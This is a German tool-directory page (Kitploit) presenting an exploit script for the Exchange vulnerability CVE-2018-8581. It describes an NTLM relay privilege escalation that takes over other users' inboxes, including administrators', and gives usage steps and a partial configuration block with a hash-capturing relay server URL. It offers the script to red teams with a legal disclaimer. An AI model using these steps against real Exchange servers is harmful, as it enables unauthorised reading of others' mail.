Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-8581 — CVE-2018-8581 | Kitploit
Tools/GitHubGitHub/qiantu88/cve-2018-8581
Privilege EscalationExploitationPost-ExploitationPenetrationstestsRed TeamingE-Mail-Sicherheit
GitHubqiantu88/cve-2018-8581

CVE-2018-8581

CVE-2018-8581

Repository anzeigen
551vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-8581

Dies ist eine Schwachstelle für laterale Bewegung und Privilegieneskalation auf Mailbox-Ebene.

Mit einem normalen Mailbox-Konto und Passwort kann sie die Delegierung und Übernahme des Posteingangs anderer Benutzer (einschließlich Domänenadministratoren) durchführen.

Dieses EXP-Skript ist eine verbesserte Ein-Klick-Version, die auf dem Original-PoC basiert. Nach Konfiguration der relevanten Parameter wird automatisch das Hinzufügen und Entfernen von Delegierungsberechtigungen für den Posteingang des Ziel-Mailboxes durchgeführt, um es Sicherheitsabteilungen und Red Teams zu erleichtern, einen simulierten Angriff auf autorisierte Unternehmen durchzuführen.

Das Original-PoC bestand aus zwei Skripten, die zusammenarbeiteten, um eine Nachrichtenregel hinzuzufügen. In der praktischen Arbeit von Red Teams war es nicht sehr nützlich. Das Original-PoC benötigte zusätzlich zum Mailbox-Konto noch die SID des Zielbenutzers. Die in dem Artikel erwähnte Methode zum Abrufen der Benutzer-SID konnte ich in meiner Umgebung mit Exchange Server 2010 und 2013 nicht erfolgreich reproduzieren (2010 hatte keine entsprechende Option, 2013 zeigte eine Berechtigungsverweigerung an). Schließlich kam ich auf die Idee, zuerst eine umgekehrte Delegierung durchzuführen, um die SID des Zielbenutzers zu erhalten, und dann die Delegierung zu entfernen.

Verwendung

  • Installiere python-ntlm

    pip install python-ntlm

  • Konfiguriere die relevanten Parameter im folgenden Code des Skripts

    root@kitploit:~
    ...
    # Exchange server config
    IP = 'mail.target_domain.com'
    PORT = 443
    PROTO = 'https'
    # PORT = 80
    # PROTO = 'http'
    
    # CONTROLLED_EMAIL and TARGET_EMAIL config
    USER = 'the_email_u_have'
    DOMAIN = 'the_domain_name'
    PASS = 'password_of_the_email_u_have'
    
    TARGET_EMAIL = "the_target_email_u_want@target_domain.com"
    CONTROLLED_EMAIL = "the_email_u_have@target_domain"
    
    # FLAG == 1 --> AddDelegate, FLAG == 0 --> RemoveDelegate
    FLAG = 1
    
    # Exchange server version 
    # EXCHANGE_VERSION = "Exchange2010_SP1"
    EXCHANGE_VERSION = "Exchange2010_SP2"
    # EXCHANGE_VERSION = "Exchange2010_SP3"
    # EXCHANGE_VERSION = "Exchange2013"
    # EXCHANGE_VERSION = "Exchange2016"
    
    #Port and url of ur HTTP server that will use NTLM hashes for impersonation of TARGET_EMAIL
    HTTPPORT = 8080
    EVIL_HTTPSERVER_URL = "http://ur_http_server_ip:8080/"
    ...
    
  • Führe das Skript aus, trinke einen Schluck Goji-Tee und warte eine Minute.

    img1

  • Der Posteingang von TARGET_EMAIL wurde erfolgreich an CONTROLLED_EMAIL delegiert.

  • Überprüfe den Posteingang des Zielpostfachs in OWA oder Outlook.

    img2

  • Setze FLAG auf 0, führe das Skript erneut aus, trinke noch einen Schluck Goji-Tee und warte eine weitere Minute. Dadurch wird die zuvor hinzugefügte Delegierung entfernt.

    img3

  • Kein Zugriff mehr möglich.

Testumgebung

  • Python 2.7.14

  • Exchange Server 2010 SP2

  • Exchange Server 2013

Mehr

Weitere EWS SOAP-API-Anfragen können in der Funktion make_relay_body() geändert werden.

Hinweis

Das Skript dient nur zu Lern- und Kommunikationszwecken. Der Benutzer muss die geltenden lokalen Gesetze einhalten. Bei einer anderen Nutzung übernimmt der Autor keinerlei rechtliche Verantwortung. Der Download und die Nutzung bedeuten, dass der Benutzer den obigen Aussagen zustimmt.

Tool herunterladen